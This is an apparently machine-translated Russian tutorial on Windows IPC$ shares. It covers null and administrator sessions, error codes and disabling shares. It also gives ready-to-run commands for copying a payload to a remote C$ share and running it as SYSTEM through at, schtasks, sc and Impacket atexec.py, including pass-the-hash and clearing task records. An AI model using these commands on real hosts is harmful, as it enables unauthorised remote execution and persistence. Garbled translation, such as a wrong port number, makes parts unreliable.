Оглавление

Общие команды общего доступа

IPC$

Условия использования IPC$

1: Открыть порты 139 и 445.

2: На целевом хосте включено совместное использование IPC$.

3: ошибка подключения IPC

Пустое соединение IPC

Что может сделать нулевое соединение (оно не имеет никакого эффекта)

IPC$ ненулевое соединение

Что может сделать ненулевое соединение IPC$?

команда dir (просмотр файлов и каталогов)

команда списка задач (просмотр процесса)

по команде (команда плана, может отскочить снаряд)

schtasks (запланированные задачи)

atexec.py в Impacket

Отключите акции IPC$ и другие акции.

Причины сбоя подключения IPC$ и номера распространенных ошибок

Причина сбоя соединения

Распространенные номера ошибок

Общие команды общего доступа

net use                               #Просмотр подключений, установленных этой машиной (этот компьютер подключается к другим машинам)
net session                           #Просмотр подключений, установленных на этом компьютере (локальный компьютер, подключенный к другим машинам), который должен выполнить пользователь-администратор.
net share                             #Просмотр локально включенного общего доступа
net share ipc$                        #Включить общий доступ к ipc$
net share ipc$ /del                   #Удалить долю ipc$
net share admin$ /del                 #Удалить администратора$ поделиться
net share c$ /del                     #Удалить общий доступ к диску C
net share d$ /del                     #Удалить общий доступ к диску D
net use * /del                        #Удалить все соединения

net use \\192.168.10.15                   #Устанавливаем пустое соединение ipc с 192.168.10.15
net use \\192.168.10.15\ipc$              #Устанавливаем пустое соединение ipc с 192.168.10.15
net use \\192.168.10.15\ipc$ /u:"" ""     #Устанавливаем пустое соединение ipc с 192.168.10.15

net view \\192.168.10.15                  #Просмотр общих ресурсов по умолчанию, включенных удаленным хостом

net use \\192.168.10.15 /u:"administrator" "root"   #Установим соединение ipc с именем 192.168.10.15 от имени администратора.
net use \\192.168.10.15 /del              #Удаляем установленное соединение ipc

net time \\192.168.10.15                  #Просмотр времени на хосте

net use \\192.168.10.15\c$  /u:"administrator" "root"  #Создать общий доступ к диску C
dir \\192.168.10.15\c$                  #Просмотр файлов диска 192.168.10.15C
dir \\192.168.10.15\c$\user             #Просмотр файлов диска пользователь Оглавление под 192.168.10.15C
dir \\192.168.10.15\c$\user\test.exe    #Просмотр файлов диска пользователь Оглавление под 192.168.10.15Cвнизtest.exe文件
net use \\192.168.10.15\c$  /del        #Удаляем общее подключение диска C

net use k: \\192.168.10.15\c$  /u:"administrator" "root"  #Сопоставляем целевой диск C с локальным диском K
net use k: /del                                           #Удалить сопоставление

IPC$

IPC$ (Internet Process Connection) Это ресурс, который совместно использует «именованные каналы». Это именованный канал, открытый для межпроцессного взаимодействия. Предоставляя доверенное имя пользователя и пароль, обе стороны могут установить безопасный канал и обмениваться зашифрованными данными через этот канал, тем самым достигая успеха. Доступ к удаленным компьютерам. IPC$ — это новая функция NT2000, позволяющая одновременно установить только одно соединение между двумя IP-адресами. NT2000 предоставляется в IPC$ При совместном использовании функций,Общий ресурс по умолчанию также был включен при первой установке системы.,То есть все логическое разделение (C$, D$, E$...) и системное Оглавление общего доступа (Admin$). Все эти первоначальные намерения заключаются в облегчении управления администраторами. Но благие намерения не обязательно приводят к хорошим результатам.,Некоторые люди со скрытыми мотивами будут использовать IPC$.,Доступ к общим ресурсам,Экспортировать список пользователей,и использовать некоторые словарные инструменты,Выполните обнаружение пароля.

Для работы с общим доступом к IPC операционные системы Windows (за исключением Windows 98 серия) после завершения установки,Автоматически устанавливать общее Оглавление: диск C, диск D, диск E, Оглавление ADMIN (C:\Windows) и т. д.,То естьADMIN、C、D、Eждать,Но будьте осторожны,Эти акции скрыты,Только администраторы могут управлять ими удаленно.

Введите чистую долю, чтобы просмотреть включенные общие ресурсы.

Введите чистую долю, чтобы просмотреть включенные общие ресурсы.

Все общие ресурсы используют порт 139 или 445.

Условия использования IPC$

1: Открыть порты 139 и 445.

Сначала давайте поймем некоторые основы:

• SMB: (блок сообщений сервера) набор протоколов Windows, используемый для служб совместного использования файлов и принтеров;
• NBT: (NETBios Over TCP/IP) использует порты 137 (UDP), 138 (UDP) и 139 (TCP) для реализации сетевого взаимодействия NETBIOS на основе протокола TCP/IP.
• В Windows NT SMB реализован на основе NBT, то есть с использованием порта 139 (TCP), в Windows 2000 помимо реализации на основе NBT SMB может быть реализован и напрямую через порт 445;

Для клиента win2000 (инициатора):

• Если NBT разрешено подключение к серверу, клиент попытается получить доступ к портам 139 и 445 одновременно. Если на порту 445 есть ответ, он отправит пакет RST на порт 139 для отключения и будет использовать порт 455. для сеанса. Если порт 445 не отвечает, будет использоваться только порт 139. Если оба порта не отвечают, сеанс завершится неудачно;
• Если вы подключитесь к серверу с отключенным NBT, клиент попытается получить доступ только к порту 445. Если порт 445 не отвечает, сеанс завершится неудачно.

Для серверной части win2000:

• Если NBT разрешен, порты UDP 137, 138, TCP-порты 139, 445 будут открыты (Прослушивание);
• Если NBT отключен, открыт только порт 445.

Выбор порта для сеанса IPC, который мы установили, также соответствует вышеуказанным принципам. Очевидно, что если на удаленном сервере нет монитора или порта, выбор порта для сеанса также следует вышеуказанным принципам. Очевидно, что если удаленный сервер не прослушивает порт 139 или 445, сеанс IPC не может быть установлен.

2: На целевом хосте включено совместное использование IPC$.

Общий доступ по умолчанию включен по умолчанию, чтобы облегчить удаленное управление администраторами.,Включает все логические диски(C、Dждать)и система Оглавление winnt или windows(admin) и МПК。Эти общие ресурсы включены по умолчанию。Можно использоватьnet Команда «share» проверяет, включены ли эти общие ресурсы.

3: ошибка подключения IPC

Если целевой хост не открыт 139или445порт,Если мы используем IPC$ для подключения,Будет выдано сообщение о том, что имя сети не найдено.

Пустое соединение IPC

Прежде чем представить пустой сеанс, нам необходимо понять, как устанавливается безопасный сеанс. в Windows В NT используйте NTLMСертификация механизма реагирования на вызовы。портал——> Метод аутентификации NTLM (в среде рабочей группы)

Нулевой сеанс — это сеанс, установленный с сервером без доверия (то есть имя пользователя и пароль не предоставляются). Так что же именно вы можете сделать, установив пустой сеанс? Используйте IPC, хакер может даже установить пустое соединение с целевым хостом без имени пользователя и пароля (конечно, на другой машине должен быть включен IPC)общий,В противном случае вы не сможете подключиться), и используя это пустое соединение, коннектор также может получить список пользователей на целевом хосте (но ответственный администратор запретит экспортировать список пользователей). После установления пустого соединения,Хакеры могут получить много информации (и эта информация часто необходима для вторжений).,Доступ к некоторым общим ресурсам,Если хакер может войти в систему как пользователь с определенными разрешениями,Тогда вы получите соответствующие разрешения.

Установить пустое соединение IPC$

учреждение Пустое соединение МПК
чистое использование \\192.168.10.15
или сетевое использование \\192.168.10.15 /u:"" ""
или используйте чистое \\192.168.10.15\ipc$ /u:"" ""

Что может сделать нулевое соединение (оно не имеет никакого эффекта)

После Windows 2003 пустые соединения не имеют разрешений, а значит, не имеют большого практического применения. Пароль администратора администратора некоторых хостов пуст, тогда мы можем попробовать использовать следующую команду для подключения, но в большинстве случаев сервер блокирует использование пустых паролей для подключения.

Раньше вы могли получить некоторую полезную информацию, установив пустой сеанс, но теперь разрешения пустого сеанса очень низкие, и доступ запрещен.

IPC$ ненулевое соединение

Создать IPC$ ненулевое соединение
net use \\192.168.10.131  /u:"administrator"  "пароль"

Что может сделать ненулевое соединение IPC$?

• Использовать пользователей в группе администраторов(administratorили Все пользователи в других группах администраторов могут)Создать IPC$соединение,Все следующие команды могут быть выполнены.
• Когда вы используете обычного пользователя для установления соединения IPC$, вы можете выполнить только команду для просмотра времени: net time \192.168.10.131. Никакие другие команды не могут быть выполнены.

команда dir (просмотр файлов и каталогов)

Вы также можете использовать команду непосредственно в управлении файлами: \192.168.10.131\c$ Посмотреть соответствующие файлы и Оглавление,Вы также можете добавлять, удалять, изменять и проверять

команда списка задач (просмотр процесса)

tasklist /S 192.168.10.131 /U administrator -P пароль

по команде (команда плана, может отскочить снаряд)

• Проверьте целевое системное время: чистое время \192.168.10.131
• Скопируйте указанный файл, копировать под этот файл в целевую систему: скопируйте vps.exe \192.168.10.131\c$
• Используйте at для создания запланированного задания: at \192.168.10.131 17:00:00 C:\vps.exe
• Очистить записи: по адресу \192.168.10.131 идентификатор задания /удалить
• Используйте команду at для выполнения, запишите результаты выполнения в локальный текстовый файл, а затем используйте команду type для просмотра содержимого файла: at \192.168.10.131 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "
• Просмотрите созданный файл 1.txt: введите \192.168.10.131\C$\1.txt.

schtasks (запланированные задачи)

В операционных системах Windows Vista, Windows Server 2008 и более поздних версиях команда at устарела и переключились на команду schtasks. Команда schtasks более гибкая, чем команда at. При использовании команды schtasks в системе останется файл журнала: C:\Windows\Tasks\SchedLgU.txt.

Создайте запланированную задачу с именем test на целевом хосте.,Программа запуска — C:\vps.exe.,Разрешение на запуск — системное,Время запуска — каждый час
schtasks /create /s 192.168.10.131 /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f

Другие параметры времени запуска:
/sc onlogon  Запускается, когда пользователь входит в систему
/sc onstart  Запуск при запуске системы
/sc onidle   Запуск, когда система простаивает

Запросить запланированное задание тестирования
schtasks /query | findstr test

Запустить тестовое запланированное задание
schtasks /run /s 192.168.10.131 /i /tn "test"

Удалить запланированное задание тестирования
schtasks /delete /s 192.168.10.131 /tn "test" /f

команда sc создает запланированные задачи
copy test.exe \\192.168.10.20\c$
sc \\192.168.10.20 create test binpath= "c:\test.exe"
sc \\192.168.10.20 start test
sc \\192.168.10.20 del test

atexec.py в Impacket

atexec.py в Импакетный скрипт,Просто используйте запланированные задачи для получения разрешений,该Скрипт的利用需要开启ipc$общий。这个Скрипт仅工作Windows>=Vistaв системе。Этот образец можно использовать через службу планировщика задач.（Task Планировщик) для выполнения команды на целевом хосте и возврата выходного результата после выполнения команды. 。

 ./atexec.py  xie/hack:x123456./@192.168.10.130  whoami
 ./atexec.py  xie/hack:@192.168.10.130  whoami  -hashes aada8eda23213c027743e6c498d751aa:b98e75b5ff7a3d3ff05e07f211ebe7a8

Отключите акции IPC$ и другие акции.

Поскольку ipc$ опасен и бесполезен для большинства из нас, мы выполняем следующую команду, чтобы отключить общий доступ.

1. Используйте команду для закрытия:

net  share  ipc$    /delete              Отключить общий доступ IPC по умолчанию
net  share  c$      /delete              Отключите общий доступ к диску C по умолчанию.
net  share  admin$  /delete              Закрыть общий доступ admin$ по умолчанию

2. Измените реестр и закройте его.

Ограничьте долю IPC$ по умолчанию:

• HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa
• Name：restrictanonymous
• Type：REG_DWORD
• Значение: 0x0 (по умолчанию) 0x1 Анонимные пользователи не могут перечислять локальный список пользователей. 0x2 Анонимные пользователи не могут подключиться к локальному общему ресурсу IPC$. Примечание. Не рекомендуется использовать значение 2, иначе некоторые службы могут не запуститься, например SQL-сервер.

Причины сбоя подключения IPC$ и номера распространенных ошибок

Причина сбоя соединения

• имя пользователяилипарольошибка
• На целевом хосте не включен общий доступ к IPC$.
• Невозможно успешно подключиться к портам 139 и 445 целевого хоста.
• Ошибка команды входить

Распространенные номера ошибок

• Ошибка № 5: Доступ запрещен
• Ошибка номер 51: Windows не может найти сетевой путь, и в сети возникла проблема.
• Ошибка номер 53: сетевой путь не найден, включая неправильный IP-адрес, целевой объект не включен, целевой сервис lanmanserver не запущен, а целевой брандмауэр фильтрует порт.
• Ошибка номер 67: Невозможно найти имя сети, в том числе служба lanmanworkstation не запущена и IPC$ удален.
• Ошибка номер 1219: предоставленные учетные данные конфликтуют с существующим набором учетных данных. Например, соединение IPC$ было установлено с целью, и после удаления его необходимо повторно подключить.
• ошибка号1326：未知的имя пользователяилиошибка的пароль
• Ошибка номер 1792: Была предпринята попытка входа в систему, но служба входа в сеть не запустилась, включая целевую службу NetLogon, которая не запустилась (это происходит при подключении к контроллеру домена)
• Ошибка номер 2242: Срок действия пароля этого пользователя истек.

Похожие статьи：Обслуживание разрешений Windows

Безопасность системы Windows | Порты 135, 137, 138, 139 и 445